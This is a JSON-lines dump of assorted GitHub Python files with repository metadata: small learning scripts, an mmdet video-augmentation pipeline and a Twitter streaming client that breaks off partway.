\"\"\", unsafe_allow_html=True)\r\n st.subheader('Optimum Maximum Profit')\r\n st.write(str(carA_profit_solution + carB_profit_solution)+ \" Dollars\")\r\n \r\n else:\r\n st.write(\"Please check the model or check with differernt data set\")\r\n \r\n \r\nelse:\r\n st.write('Click Solve to generarte the Production plan')\r\n","repo_name":"suresh-abeyweera/Optimization-with-Python-docplex-Part2","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":7611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40573160997","text":"import xlrd\n\nbook = xlrd.open_workbook('ClassConcentrations.xlsx')\n\nmajor = input(\"Enter your major: \")\nsheet = book.sheet_by_name(major)\n\nclassName = input(\"Enter class name: \")\n\nfor i in range(sheet.ncols):\n concentrationName = sheet.cell_value(0,i)\n for j in range(sheet.nrows):\n if (sheet.cell_value(j,i) == className):\n print('distribution requirement: ' + concentrationName)","repo_name":"AlexFeeley/Vandy-ClassFinder","sub_path":"ParseSpreadsheet.py","file_name":"ParseSpreadsheet.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"20526640691","text":"#\nfrom decimal import Decimal, InvalidOperation\n\nprint(\"程序将执行 2 个数的加法\")\nprint(\"非法字符会报异常\\n\")\nnum_1 = input(\" 请输入第 1 个数字:\")\nnum_2 = input(\" 请输入第 2 个数字:\")\n\ntry:\n # 引入高精度计算\n result = Decimal(num_1) + Decimal(num_2)\nexcept (ValueError, InvalidOperation):\n # 捕获多异常 https://www.ycpai.cn/python/mph7ePQH.html\n print('输入有误,请输入纯数字')\nexcept Exception:\n print('过于宽泛的捕获未知异常')\nelse:\n print('求和结果为:' + str(result))\n","repo_name":"ChinaTjcm/hello-python","sub_path":"src/demo/python编程-入门/10-文件和异常/Error_10_3.py","file_name":"Error_10_3.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23847036984","text":"import os\nos.remove(\"tst.txt\")\nos.rename(\"tst.txt\",\"tst2.txt\")\nos.path.exists(\"tst.txt\")\nos.path.getsize(\"tst.txt\")\nos.path.getmtime(\"tst.txt\")\n\nimport datetime\ntimestamp = os.path.getmtime(\"tst.txt\")\ndatetime.datetime.fromtimestamp(timestamp)\n\nos.path.abspath(\"tst.txt\")\nos.path.getmtime(\"tst.txt\")\nprint(os.getcwd())\nos.mkdir(\"new_dir\")\nos.chdir(\"new_dir\")\nos.getmtime(\"tst.txt\")\nos.rmdir(\"new_dir\")\nos.listdir(\"new_dir\")\nos.path.join(\"new_dir\",\"tst.txt\")","repo_name":"ahmedtariq01/Automation_with_Python","sub_path":"Python_with_Os/working_with_files.py","file_name":"working_with_files.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42213880768","text":"#!/usr/bin/python3\n\"\"\"Module with a class\"\"\"\nimport uuid\nfrom datetime import datetime\n\n\nclass BaseModel:\n \"\"\"\n Class that defines all common attributes/methods for other classes.\n \"\"\"\n # self stands for the instance itself\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Defines public instance attributes:\n id: (string) That's assigned a unique id.\n created_at: (datetime) That's assigned the current date\n when an instance is created.\n updated_at: (datetime) That's assigned the the current datetime\n when an instance is created and it will be updated\n every time you change your object.\n \"\"\"\n # each key of the kwargs dictionay is an attribute name, except for\n # __class__ that shouldn't be added as an attribute.\n # each value of the dict is an attribute name.\n if len(kwargs) != 0:\n for key, value in kwargs.items():\n # created_at is a str in kwargs dic, change to datetime format\n if key == 'created_at':\n if type('created_at') == str:\n value = datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f')\n\n # updated_at is a str in kwargs dic, change to datetime format\n elif key == 'updated_at':\n if type('updated_at') == str:\n value = datetime.strptime(\n value, '%Y-%m-%dT%H:%M:%S.%f')\n\n # anything else that's not attribute like __class__\n self.__dict__[key] = value\n\n # or you can say if key != '__class__', setarr(self, key, value)\n\n else:\n # if no kwargs then generate you own\n # id should str when saved in __dict__, can not wait until to_dict()\n # runs for id to be string :)\n self.id = str(uuid.uuid4())\n\n # .now() picks up the current time when instance is intialised\n\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n\n def __str__(self):\n \"\"\"Returns the information about an instance/object like:\n Class name,\n Instance id,\n Dictionary of the attributes of instance\n \"\"\"\n\n # for the name of class use -> self.__class__.__name__\n \"\"\"self.__dict__ is a dictionary that stores\n an instances's writable attributes\"\"\"\n\n info = \"[{}] ({}) {}\".format(\n self.__class__.__name__, self.id, self.__dict__)\n return info\n\n # Pubic instance methods:\n\n def save(self):\n \"\"\"\n Updates the public instance attribute updated_at\n with the current datetime when changes are done.\n \"\"\"\n\n self.updated_at = datetime.now()\n\n def to_dict(self):\n \"\"\"\n Generate a dictionary representation of an instance. \n Returns a dictionary containing all keys/values of __dict__\n of the instance. Plus the class name, created_at and updated_at\n as string object in ISO format. \n \"\"\"\n\n dic = {}\n # we need everything of __dic__ in dic, so we just assign it to dic\n dic = self.__dict__\n\n # then we add the rest info\n # note: keys have to be strings\n dic['__class__'] = self.__class__.__name__\n\n # No need to add id because it's in __dict__\n #dic['id'] = id\n\n # change created_at & updated_at to ISO format\n\n created_at = str(self.created_at.isoformat())\n updated_at = str(self.updated_at.isoformat())\n\n # add them to dic plus the id\n dic['created_at'] = created_at\n dic['updated_at'] = updated_at\n\n return dic\n","repo_name":"rihannas/PetBnB","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33023358492","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom numpy import random\n\nsns.distplot([0, 1, 2, 3, 4, 5])\nplt.show()\n\nsns.distplot([0,1,3,5,9], hist=False)\nplt.show()\n\nx=random.normal(size=(2,3))#random distribution of 2*3\nprint(x)\n\nx=random.normal(loc=1, scale=2, size=(12,13))","repo_name":"PrakashSewani/Python","sub_path":"Introduction/Basics/NumPySeaborn.py","file_name":"NumPySeaborn.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31479322875","text":"import copy\nimport mmcv\nimport cv2\nimport numpy as np\nfrom mmdet.core import find_inside_bboxes\nfrom mmdet.datasets.builder import PIPELINES\nfrom mmdet.datasets.pipelines import (MixUp, Mosaic, Normalize, Pad,\n RandomAffine, RandomFlip, Resize,\n YOLOXHSVRandomAug)\nfrom numpy import random\n\n\n@PIPELINES.register_module()\nclass SeqResize(Resize):\n def __init__(self, share_params=True, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.share_params = share_params\n\n def __call__(self, results):\n outs, scale = [], None\n for i, _results in enumerate(results):\n if self.share_params and i > 0:\n _results[\"scale\"] = scale\n _results = super().__call__(_results)\n if self.share_params and i == 0:\n scale = _results[\"scale\"]\n outs.append(_results)\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqNormalize(Normalize):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = super().__call__(_results)\n outs.append(_results)\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqRandomFlip(RandomFlip):\n def __init__(self, share_params, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.share_params = share_params\n\n def __call__(self, results):\n if self.share_params:\n if isinstance(self.direction, list):\n # None means non-flip\n direction_list = self.direction + [None]\n else:\n # None means non-flip\n direction_list = [self.direction, None]\n\n if isinstance(self.flip_ratio, list):\n non_flip_ratio = 1 - sum(self.flip_ratio)\n flip_ratio_list = self.flip_ratio + [non_flip_ratio]\n else:\n non_flip_ratio = 1 - self.flip_ratio\n # exclude non-flip\n single_ratio = self.flip_ratio / (len(direction_list) - 1)\n flip_ratio_list = [single_ratio] * (len(direction_list) - 1) + [\n non_flip_ratio\n ]\n\n cur_dir = np.random.choice(direction_list, p=flip_ratio_list)\n flip = cur_dir is not None\n flip_direction = cur_dir\n\n for _results in results:\n _results[\"flip\"] = flip\n _results[\"flip_direction\"] = flip_direction\n\n outs = []\n for _results in results:\n _results = super().__call__(_results)\n outs.append(_results)\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqPad(Pad):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = super().__call__(_results)\n outs.append(_results)\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqRandomCrop(object):\n def __init__(\n self,\n crop_size,\n allow_negative_crop=False,\n share_params=False,\n bbox_clip_border=True,\n ):\n assert crop_size[0] > 0 and crop_size[1] > 0\n self.crop_size = crop_size\n self.allow_negative_crop = allow_negative_crop\n self.share_params = share_params\n # The key correspondence from bboxes to labels and masks.\n self.bbox2label = {\n \"gt_bboxes\": [\"gt_labels\", \"gt_instance_ids\"],\n \"gt_bboxes_ignore\": [\"gt_labels_ignore\", \"gt_instance_ids_ignore\"],\n }\n self.bbox2mask = {\n \"gt_bboxes\": \"gt_masks\",\n \"gt_bboxes_ignore\": \"gt_masks_ignore\",\n }\n self.bbox_clip_border = bbox_clip_border\n\n def get_offsets(self, img):\n margin_h = max(img.shape[0] - self.crop_size[0], 0)\n margin_w = max(img.shape[1] - self.crop_size[1], 0)\n offset_h = np.random.randint(0, margin_h + 1)\n offset_w = np.random.randint(0, margin_w + 1)\n return offset_h, offset_w\n\n def random_crop(self, results, offsets=None):\n \"\"\"Call function to randomly crop images, bounding boxes, masks,\n semantic segmentation maps.\n Args:\n results (dict): Result dict from loading pipeline.\n Returns:\n dict: Randomly cropped results, 'img_shape' key in result dict is\n updated according to crop size.\n \"\"\"\n\n for key in results.get(\"img_fields\", [\"img\"]):\n img = results[key]\n if offsets is not None:\n offset_h, offset_w = offsets\n else:\n offset_h, offset_w = self.get_offsets(img)\n results[\"img_info\"][\"crop_offsets\"] = (offset_h, offset_w)\n crop_y1, crop_y2 = offset_h, offset_h + self.crop_size[0]\n crop_x1, crop_x2 = offset_w, offset_w + self.crop_size[1]\n\n # crop the image\n img = img[crop_y1:crop_y2, crop_x1:crop_x2, ...]\n img_shape = img.shape\n results[key] = img\n results[\"img_shape\"] = img_shape\n\n # crop bboxes accordingly and clip to the image boundary\n for key in results.get(\"bbox_fields\", []):\n # e.g. gt_bboxes and gt_bboxes_ignore\n bbox_offset = np.array(\n [offset_w, offset_h, offset_w, offset_h], dtype=np.float32\n )\n bboxes = results[key] - bbox_offset\n if self.bbox_clip_border:\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, img_shape[1])\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, img_shape[0])\n valid_inds = (bboxes[:, 2] > bboxes[:, 0]) & (bboxes[:, 3] > bboxes[:, 1])\n # If the crop does not contain any gt-bbox area and\n # self.allow_negative_crop is False, skip this image.\n if (\n key == \"gt_bboxes\"\n and not valid_inds.any()\n and not self.allow_negative_crop\n ):\n return None\n results[key] = bboxes[valid_inds, :]\n # label fields. e.g. gt_labels and gt_labels_ignore\n label_keys = self.bbox2label.get(key)\n for label_key in label_keys:\n if label_key in results:\n results[label_key] = results[label_key][valid_inds]\n\n # mask fields, e.g. gt_masks and gt_masks_ignore\n mask_key = self.bbox2mask.get(key)\n if mask_key in results:\n results[mask_key] = results[mask_key][valid_inds.nonzero()[0]].crop(\n np.asarray([crop_x1, crop_y1, crop_x2, crop_y2])\n )\n\n # crop semantic seg\n for key in results.get(\"seg_fields\", []):\n results[key] = results[key][crop_y1:crop_y2, crop_x1:crop_x2]\n return results\n\n def __call__(self, results):\n if self.share_params:\n offsets = self.get_offsets(results[0][\"img\"])\n else:\n offsets = None\n\n outs = []\n for _results in results:\n _results = self.random_crop(_results, offsets)\n if _results is None:\n return None\n outs.append(_results)\n\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqPhotoMetricDistortion(object):\n \"\"\"Apply photometric distortion to image sequentially, every transformation\n is applied with a probability of 0.5. The position of random contrast is in\n second or second to last.\n 1. random brightness\n 2. random contrast (mode 0)\n 3. convert color from BGR to HSV\n 4. random saturation\n 5. random hue\n 6. convert color from HSV to BGR\n 7. random contrast (mode 1)\n 8. randomly swap channels\n Args:\n brightness_delta (int): delta of brightness.\n contrast_range (tuple): range of contrast.\n saturation_range (tuple): range of saturation.\n hue_delta (int): delta of hue.\n \"\"\"\n\n def __init__(\n self,\n share_params=True,\n brightness_delta=32,\n contrast_range=(0.5, 1.5),\n saturation_range=(0.5, 1.5),\n hue_delta=18,\n ):\n self.share_params = share_params\n self.brightness_delta = brightness_delta\n self.contrast_lower, self.contrast_upper = contrast_range\n self.saturation_lower, self.saturation_upper = saturation_range\n self.hue_delta = hue_delta\n\n def get_params(self):\n params = dict()\n # delta\n if np.random.randint(2):\n params[\"delta\"] = np.random.uniform(\n -self.brightness_delta, self.brightness_delta\n )\n else:\n params[\"delta\"] = None\n # mode\n mode = np.random.randint(2)\n params[\"contrast_first\"] = True if mode == 1 else 0\n # alpha\n if np.random.randint(2):\n params[\"alpha\"] = np.random.uniform(\n self.contrast_lower, self.contrast_upper\n )\n else:\n params[\"alpha\"] = None\n # saturation\n if np.random.randint(2):\n params[\"saturation\"] = np.random.uniform(\n self.saturation_lower, self.saturation_upper\n )\n else:\n params[\"saturation\"] = None\n # hue\n if np.random.randint(2):\n params[\"hue\"] = np.random.uniform(-self.hue_delta, self.hue_delta)\n else:\n params[\"hue\"] = None\n # swap\n if np.random.randint(2):\n params[\"permutation\"] = np.random.permutation(3)\n else:\n params[\"permutation\"] = None\n return params\n\n def photo_metric_distortion(self, results, params=None):\n \"\"\"Call function to perform photometric distortion on images.\n Args:\n results (dict): Result dict from loading pipeline.\n Returns:\n dict: Result dict with images distorted.\n \"\"\"\n if params is None:\n params = self.get_params()\n results[\"img_info\"][\"color_jitter\"] = params\n\n if \"img_fields\" in results:\n assert results[\"img_fields\"] == [\"img\"], \"Only single img_fields is allowed\"\n img = results[\"img\"]\n assert img.dtype == np.float32, (\n \"PhotoMetricDistortion needs the input image of dtype np.float32,\"\n ' please set \"to_float32=True\" in \"LoadImageFromFile\" pipeline'\n )\n # random brightness\n if params[\"delta\"] is not None:\n img += params[\"delta\"]\n\n # mode == 0 --> do random contrast first\n # mode == 1 --> do random contrast last\n if params[\"contrast_first\"]:\n if params[\"alpha\"] is not None:\n img *= params[\"alpha\"]\n\n # convert color from BGR to HSV\n img = mmcv.bgr2hsv(img)\n\n # random saturation\n if params[\"saturation\"] is not None:\n img[..., 1] *= params[\"saturation\"]\n\n # random hue\n if params[\"hue\"] is not None:\n img[..., 0] += params[\"hue\"]\n img[..., 0][img[..., 0] > 360] -= 360\n img[..., 0][img[..., 0] < 0] += 360\n\n # convert color from HSV to BGR\n img = mmcv.hsv2bgr(img)\n\n # random contrast\n if not params[\"contrast_first\"]:\n if params[\"alpha\"] is not None:\n img *= params[\"alpha\"]\n\n # randomly swap channels\n if params[\"permutation\"] is not None:\n img = img[..., params[\"permutation\"]]\n\n results[\"img\"] = img\n return results\n\n def __call__(self, results):\n if self.share_params:\n params = self.get_params()\n else:\n params = None\n\n outs = []\n for _results in results:\n _results = self.photo_metric_distortion(_results, params)\n outs.append(_results)\n\n return outs\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += f\"(\\nbrightness_delta={self.brightness_delta},\\n\"\n repr_str += \"contrast_range=\"\n repr_str += f\"{(self.contrast_lower, self.contrast_upper)},\\n\"\n repr_str += \"saturation_range=\"\n repr_str += f\"{(self.saturation_lower, self.saturation_upper)},\\n\"\n repr_str += f\"hue_delta={self.hue_delta})\"\n return repr_str\n\n\n@PIPELINES.register_module()\nclass SeqMosaic(Mosaic):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = self._mosaic_transform(_results)\n outs.append(_results)\n return outs\n\n def _mosaic_transform(self, results):\n \"\"\"Mosaic transform function.\n\n Args:\n results (dict): Result dict.\n\n Returns:\n dict: Updated result dict.\n \"\"\"\n\n assert \"mix_results\" in results\n mosaic_labels = []\n mosaic_bboxes = []\n if len(results[\"img\"].shape) == 3:\n mosaic_img = np.full(\n (int(self.img_scale[0] * 2), int(self.img_scale[1] * 2), 3),\n self.pad_val,\n dtype=results[\"img\"].dtype,\n )\n else:\n mosaic_img = np.full(\n (int(self.img_scale[0] * 2), int(self.img_scale[1] * 2)),\n self.pad_val,\n dtype=results[\"img\"].dtype,\n )\n\n # mosaic center x, y\n center_x = int(random.uniform(*self.center_ratio_range) * self.img_scale[1])\n center_y = int(random.uniform(*self.center_ratio_range) * self.img_scale[0])\n center_position = (center_x, center_y)\n\n loc_strs = (\"top_left\", \"top_right\", \"bottom_left\", \"bottom_right\")\n for i, loc in enumerate(loc_strs):\n if loc == \"top_left\":\n results_patch = copy.deepcopy(results)\n else:\n results_patch = copy.deepcopy(results[\"mix_results\"][i - 1])\n\n img_i = results_patch[\"img\"]\n h_i, w_i = img_i.shape[:2]\n # keep_ratio resize\n scale_ratio_i = min(self.img_scale[0] / h_i, self.img_scale[1] / w_i)\n img_i = mmcv.imresize(\n img_i, (int(w_i * scale_ratio_i), int(h_i * scale_ratio_i))\n )\n\n # compute the combine parameters\n paste_coord, crop_coord = self._mosaic_combine(\n loc, center_position, img_i.shape[:2][::-1]\n )\n x1_p, y1_p, x2_p, y2_p = paste_coord\n x1_c, y1_c, x2_c, y2_c = crop_coord\n\n # crop and paste image\n mosaic_img[y1_p:y2_p, x1_p:x2_p] = img_i[y1_c:y2_c, x1_c:x2_c]\n\n # adjust coordinate\n gt_bboxes_i = results_patch[\"gt_bboxes\"]\n gt_labels_i = results_patch[\"gt_labels\"]\n\n if gt_bboxes_i.shape[0] > 0:\n padw = x1_p - x1_c\n padh = y1_p - y1_c\n gt_bboxes_i[:, 0::2] = scale_ratio_i * gt_bboxes_i[:, 0::2] + padw\n gt_bboxes_i[:, 1::2] = scale_ratio_i * gt_bboxes_i[:, 1::2] + padh\n\n mosaic_bboxes.append(gt_bboxes_i)\n mosaic_labels.append(gt_labels_i)\n\n if len(mosaic_labels) > 0:\n mosaic_bboxes = np.concatenate(mosaic_bboxes, 0)\n mosaic_labels = np.concatenate(mosaic_labels, 0)\n mosaic_inds = np.arange(0, len(mosaic_labels))\n\n if self.bbox_clip_border:\n mosaic_bboxes[:, 0::2] = np.clip(\n mosaic_bboxes[:, 0::2], 0, 2 * self.img_scale[1]\n )\n mosaic_bboxes[:, 1::2] = np.clip(\n mosaic_bboxes[:, 1::2], 0, 2 * self.img_scale[0]\n )\n\n if not self.skip_filter:\n mosaic_bboxes, mosaic_labels, mosaic_inds = self._filter_box_candidates(\n mosaic_bboxes, mosaic_labels, mosaic_inds\n )\n\n # remove outside bboxes\n inside_inds = find_inside_bboxes(\n mosaic_bboxes, 2 * self.img_scale[0], 2 * self.img_scale[1]\n )\n mosaic_bboxes = mosaic_bboxes[inside_inds]\n mosaic_labels = mosaic_labels[inside_inds]\n mosaic_inds = mosaic_inds[inside_inds]\n\n results[\"img\"] = mosaic_img\n results[\"img_shape\"] = mosaic_img.shape\n results[\"gt_bboxes\"] = mosaic_bboxes\n results[\"gt_labels\"] = mosaic_labels\n results[\"gt_match_indices\"] = mosaic_inds\n\n return results\n\n def _filter_box_candidates(self, bboxes, labels, inds):\n \"\"\"Filter out bboxes too small after Mosaic.\"\"\"\n bbox_w = bboxes[:, 2] - bboxes[:, 0]\n bbox_h = bboxes[:, 3] - bboxes[:, 1]\n valid_inds = (bbox_w > self.min_bbox_size) & (bbox_h > self.min_bbox_size)\n valid_inds = np.nonzero(valid_inds)[0]\n return bboxes[valid_inds], labels[valid_inds], inds[valid_inds]\n\n\n@PIPELINES.register_module()\nclass SeqRandomAffine(RandomAffine):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = self.random_affine(_results)\n outs.append(_results)\n return outs\n\n def random_affine(self, results):\n img = results[\"img\"]\n height = img.shape[0] + self.border[0] * 2\n width = img.shape[1] + self.border[1] * 2\n\n # Rotation\n rotation_degree = random.uniform(\n -self.max_rotate_degree, self.max_rotate_degree\n )\n rotation_matrix = self._get_rotation_matrix(rotation_degree)\n\n # Scaling\n scaling_ratio = random.uniform(\n self.scaling_ratio_range[0], self.scaling_ratio_range[1]\n )\n scaling_matrix = self._get_scaling_matrix(scaling_ratio)\n\n # Shear\n x_degree = random.uniform(-self.max_shear_degree, self.max_shear_degree)\n y_degree = random.uniform(-self.max_shear_degree, self.max_shear_degree)\n shear_matrix = self._get_shear_matrix(x_degree, y_degree)\n\n # Translation\n trans_x = (\n random.uniform(-self.max_translate_ratio, self.max_translate_ratio) * width\n )\n trans_y = (\n random.uniform(-self.max_translate_ratio, self.max_translate_ratio) * height\n )\n translate_matrix = self._get_translation_matrix(trans_x, trans_y)\n\n warp_matrix = translate_matrix @ shear_matrix @ rotation_matrix @ scaling_matrix\n\n img = cv2.warpPerspective(\n img, warp_matrix, dsize=(width, height), borderValue=self.border_val\n )\n results[\"img\"] = img\n results[\"img_shape\"] = img.shape\n\n for key in results.get(\"bbox_fields\", []):\n bboxes = results[key]\n num_bboxes = len(bboxes)\n if num_bboxes:\n # homogeneous coordinates\n xs = bboxes[:, [0, 0, 2, 2]].reshape(num_bboxes * 4)\n ys = bboxes[:, [1, 3, 3, 1]].reshape(num_bboxes * 4)\n ones = np.ones_like(xs)\n points = np.vstack([xs, ys, ones])\n\n warp_points = warp_matrix @ points\n warp_points = warp_points[:2] / warp_points[2]\n xs = warp_points[0].reshape(num_bboxes, 4)\n ys = warp_points[1].reshape(num_bboxes, 4)\n\n warp_bboxes = np.vstack((xs.min(1), ys.min(1), xs.max(1), ys.max(1))).T\n\n if self.bbox_clip_border:\n warp_bboxes[:, [0, 2]] = warp_bboxes[:, [0, 2]].clip(0, width)\n warp_bboxes[:, [1, 3]] = warp_bboxes[:, [1, 3]].clip(0, height)\n\n # remove outside bbox\n valid_index = find_inside_bboxes(warp_bboxes, height, width)\n if not self.skip_filter:\n # filter bboxes\n filter_index = self.filter_gt_bboxes(\n bboxes * scaling_ratio, warp_bboxes\n )\n valid_index = valid_index & filter_index\n\n results[key] = warp_bboxes[valid_index]\n if key in [\"gt_bboxes\"]:\n if \"gt_labels\" in results:\n results[\"gt_labels\"] = results[\"gt_labels\"][valid_index]\n results[\"gt_match_indices\"] = results[\"gt_match_indices\"][\n valid_index\n ]\n\n if \"gt_masks\" in results:\n raise NotImplementedError(\"RandomAffine only supports bbox.\")\n return results\n\n\n@PIPELINES.register_module()\nclass SeqMixUp(MixUp):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = self._mixup_transform(_results)\n outs.append(_results)\n return outs\n\n def _mixup_transform(self, results):\n \"\"\"MixUp transform function.\n\n Args:\n results (dict): Result dict.\n\n Returns:\n dict: Updated result dict.\n \"\"\"\n\n assert \"mix_results\" in results\n assert len(results[\"mix_results\"]) == 1, \"MixUp only support 2 images now !\"\n\n if results[\"mix_results\"][0][\"gt_bboxes\"].shape[0] == 0:\n # empty bbox\n return results\n\n retrieve_results = results[\"mix_results\"][0]\n retrieve_img = retrieve_results[\"img\"]\n\n jit_factor = random.uniform(*self.ratio_range)\n is_filp = random.uniform(0, 1) > self.flip_ratio\n\n if len(retrieve_img.shape) == 3:\n out_img = (\n np.ones(\n (self.dynamic_scale[0], self.dynamic_scale[1], 3),\n dtype=retrieve_img.dtype,\n )\n * self.pad_val\n )\n else:\n out_img = (\n np.ones(self.dynamic_scale, dtype=retrieve_img.dtype) * self.pad_val\n )\n\n # 1. keep_ratio resize\n scale_ratio = min(\n self.dynamic_scale[0] / retrieve_img.shape[0],\n self.dynamic_scale[1] / retrieve_img.shape[1],\n )\n retrieve_img = mmcv.imresize(\n retrieve_img,\n (\n int(retrieve_img.shape[1] * scale_ratio),\n int(retrieve_img.shape[0] * scale_ratio),\n ),\n )\n\n # 2. paste\n out_img[: retrieve_img.shape[0], : retrieve_img.shape[1]] = retrieve_img\n\n # 3. scale jit\n scale_ratio *= jit_factor\n out_img = mmcv.imresize(\n out_img,\n (int(out_img.shape[1] * jit_factor), int(out_img.shape[0] * jit_factor)),\n )\n\n # 4. flip\n if is_filp:\n out_img = out_img[:, ::-1, :]\n\n # 5. random crop\n ori_img = results[\"img\"]\n origin_h, origin_w = out_img.shape[:2]\n target_h, target_w = ori_img.shape[:2]\n padded_img = np.zeros(\n (max(origin_h, target_h), max(origin_w, target_w), 3)\n ).astype(np.uint8)\n padded_img[:origin_h, :origin_w] = out_img\n\n x_offset, y_offset = 0, 0\n if padded_img.shape[0] > target_h:\n y_offset = random.randint(0, padded_img.shape[0] - target_h)\n if padded_img.shape[1] > target_w:\n x_offset = random.randint(0, padded_img.shape[1] - target_w)\n padded_cropped_img = padded_img[\n y_offset : y_offset + target_h, x_offset : x_offset + target_w\n ]\n\n # 6. adjust bbox\n retrieve_gt_bboxes = retrieve_results[\"gt_bboxes\"]\n retrieve_gt_bboxes[:, 0::2] = retrieve_gt_bboxes[:, 0::2] * scale_ratio\n retrieve_gt_bboxes[:, 1::2] = retrieve_gt_bboxes[:, 1::2] * scale_ratio\n if self.bbox_clip_border:\n retrieve_gt_bboxes[:, 0::2] = np.clip(\n retrieve_gt_bboxes[:, 0::2], 0, origin_w\n )\n retrieve_gt_bboxes[:, 1::2] = np.clip(\n retrieve_gt_bboxes[:, 1::2], 0, origin_h\n )\n\n if is_filp:\n retrieve_gt_bboxes[:, 0::2] = (\n origin_w - retrieve_gt_bboxes[:, 0::2][:, ::-1]\n )\n\n # 7. filter\n cp_retrieve_gt_bboxes = retrieve_gt_bboxes.copy()\n cp_retrieve_gt_bboxes[:, 0::2] = cp_retrieve_gt_bboxes[:, 0::2] - x_offset\n cp_retrieve_gt_bboxes[:, 1::2] = cp_retrieve_gt_bboxes[:, 1::2] - y_offset\n if self.bbox_clip_border:\n cp_retrieve_gt_bboxes[:, 0::2] = np.clip(\n cp_retrieve_gt_bboxes[:, 0::2], 0, target_w\n )\n cp_retrieve_gt_bboxes[:, 1::2] = np.clip(\n cp_retrieve_gt_bboxes[:, 1::2], 0, target_h\n )\n\n # 8. mix up\n ori_img = ori_img.astype(np.float32)\n mixup_img = 0.5 * ori_img + 0.5 * padded_cropped_img.astype(np.float32)\n\n retrieve_gt_labels = retrieve_results[\"gt_labels\"]\n retrieve_gt_match_indices = retrieve_results[\"gt_match_indices\"] + 999\n if not self.skip_filter:\n keep_list = self._filter_box_candidates(\n retrieve_gt_bboxes.T, cp_retrieve_gt_bboxes.T\n )\n\n retrieve_gt_labels = retrieve_gt_labels[keep_list]\n retrieve_gt_match_indices = retrieve_gt_match_indices[keep_list]\n cp_retrieve_gt_bboxes = cp_retrieve_gt_bboxes[keep_list]\n\n mixup_gt_bboxes = np.concatenate(\n (results[\"gt_bboxes\"], cp_retrieve_gt_bboxes), axis=0\n )\n mixup_gt_labels = np.concatenate(\n (results[\"gt_labels\"], retrieve_gt_labels), axis=0\n )\n mixup_gt_match_indices = np.concatenate(\n (results[\"gt_match_indices\"], retrieve_gt_match_indices), axis=0\n )\n\n # remove outside bbox\n inside_inds = find_inside_bboxes(mixup_gt_bboxes, target_h, target_w)\n mixup_gt_bboxes = mixup_gt_bboxes[inside_inds]\n mixup_gt_labels = mixup_gt_labels[inside_inds]\n mixup_gt_match_indices = mixup_gt_match_indices[inside_inds]\n\n results[\"img\"] = mixup_img.astype(np.uint8)\n results[\"img_shape\"] = mixup_img.shape\n results[\"gt_bboxes\"] = mixup_gt_bboxes\n results[\"gt_labels\"] = mixup_gt_labels\n results[\"gt_match_indices\"] = mixup_gt_match_indices\n\n return results\n\n\n@PIPELINES.register_module()\nclass SeqYOLOXHSVRandomAug(YOLOXHSVRandomAug):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = super().__call__(_results)\n outs.append(_results)\n return outs\n","repo_name":"SysCV/ovtrack","sub_path":"ovtrack/datasets/pipelines/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":26640,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"52"} +{"seq_id":"9784152586","text":"import os\nimport pandas as pd\nimport requests\nimport json\n\nbearer_token = os.environ.get(\"BEARER_TOKEN\")\n\ndef create_url():\n return \"https://api.twitter.com/2/tweets/sample/stream?tweet.fields=created_at,lang&expansions=author_id,geo.place_id&user.fields=created_at,public_metrics\"\n\nclass TwitterRandomSampleStream(object):\n def __init__(self,stream_url,save_path):\n self.stream_url = stream_url\n self.tweet_path = save_path\n self.tweets_fp = None\n self.flush_counter = 0 # lets see if this is required\n \n def results_init(self):\n \"\"\"\n \"\"\"\n self.tweets_fp = open(self.tweet_path,'w+',encoding='utf-8')\n \n \n def bearer_oauth(self,res):\n \"\"\"\n Method required by bearer token authentication.\n \"\"\"\n\n res.headers[\"Authorization\"] = f\"Bearer {bearer_token}\"\n res.headers[\"User-Agent\"] = \"v2FilteredStreamPython\"\n return res\n \n def get_stream(self,stream_url):\n tweet_num = 0\n try:\n response = requests.request(\"GET\", stream_url, auth=self.bearer_oauth, stream=True)\n print(\"Response Status Code : %s\"%str(response.status_code))\n \n if response.status_code != 200:\n raise 